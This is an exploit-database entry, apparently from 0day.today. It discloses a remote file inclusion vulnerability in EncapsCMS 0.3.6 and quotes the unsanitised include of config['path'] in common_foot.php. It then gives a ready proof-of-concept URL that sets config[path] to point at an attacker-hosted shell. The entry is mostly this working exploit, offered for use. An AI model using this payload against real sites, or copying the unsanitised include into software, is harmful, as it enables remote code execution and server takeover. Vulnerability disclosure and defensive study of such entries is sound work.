id: 10789
date: 02/07/2010
title: EncapsCMS <= 0.3.6 (config[path]) Remote File Include Vulnerability
author: cr4wl3r
cves: 

===================================================================
EncapsCMS <= 0.3.6 (config[path]) Remote File Include Vulnerability
===================================================================

[+] EncapsCMS <= 0.3.6 (config[path]) Remote File Include Vulnerability
[+] Discovered by cr4wl3r 
[+] Download : http://scripts.ringsworld.com/content-management/encapscms-0.3.6/
 
 
[+] Vuln Code : [common_foot.php]
 
include($config['path']."idx_foot.html");
if($config["debug"]>0){
    echo '<pre><table width=100% bgcolor=silver><tr><td></td></tr></table>'; 
    echo '$_POST:';var_dump($_POST);
 
[+] PoC :
 
[EncapsCMS_path]/common_foot.php?config[path]=[Shell]



#  0day.today [2023-03-24]  #